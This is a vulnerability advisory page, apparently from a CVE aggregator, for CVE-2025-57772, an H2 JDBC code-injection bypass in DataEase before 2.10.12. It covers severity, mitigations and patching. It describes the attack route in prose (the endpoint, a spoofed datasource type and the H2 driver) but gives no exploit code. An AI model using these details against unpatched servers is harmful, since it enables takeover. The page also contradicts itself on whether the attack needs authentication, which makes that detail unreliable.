CVE-2025-57772
Published: 25 August 2025
Summary
CVE-2025-57772 is a critical-severity Code Injection (CWE-94) vulnerability in Dataease Dataease. Its CVSS base score is 9.8 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 43.9th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 RA-5 (Vulnerability Monitoring and Scanning) and SI-10 (Information Input Validation).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
Directly mitigates the H2 JDBC RCE by requiring identification, reporting, and timely patching to version 2.10.12 or later.
Prevents exploitation by enforcing validation of JDBC URL inputs to block bypasses of H2 filtering logic.
Detects the specific CVE-2025-57772 vulnerability through regular scanning and drives remediation to prevent exploitation.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
CVE-2025-57772 is an authenticated RCE vulnerability in the public-facing DataEase web application via crafted POST to /de2api/datasource/validate, bypassing H2 JDBC filtering to execute remote scripts using a spoofed 'oracle' type with H2 driver/URL.
NVD Description
DataEase is an open source business intelligence and data visualization tool. Prior to version 2.10.12, there is a H2 JDBC RCE bypass in DataEase. If the JDBC URL meets criteria, the getJdbcUrl method is returned, which acts as the getter…
more
for the JdbcUrl parameter provided. This bypasses H2's filtering logic and returns the H2 JDBC URL, allowing the "driver":"org.h2.Driver" to specify the H2 driver for the JDBC connection. The vulnerability has been fixed in version 2.10.12.
Deeper analysisAI
CVE-2025-57772 is a remote code execution (RCE) vulnerability in DataEase, an open source business intelligence and data visualization tool. Affecting versions prior to 2.10.12, the issue stems from a H2 JDBC URL bypass in the application's JDBC handling. Specifically, if the JDBC URL meets certain criteria, the getJdbcUrl method returns the provided JdbcUrl parameter, circumventing H2's built-in filtering logic. This allows attackers to specify the H2 driver ("org.h2.Driver") for the JDBC connection, enabling arbitrary code execution. The vulnerability is classified under CWE-94 (Improper Control of Generation of Code) with a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Unauthenticated attackers can exploit this vulnerability remotely over the network with low complexity and no user interaction required. By crafting a malicious JDBC URL that bypasses the filters, an attacker can establish a JDBC connection using the H2 driver, leading to full RCE on the DataEase server. Successful exploitation grants high-impact access to confidentiality, integrity, and availability, potentially allowing full system compromise.
The vulnerability has been fixed in DataEase version 2.10.12. Security practitioners should upgrade to this version or later. Additional details are available in the official GitHub security advisory (GHSA-v37q-vh67-9rqv) and the fixing commit (1644d81dff46272b09570fa1f4a8f83f01f37440).
Details
- CWE(s)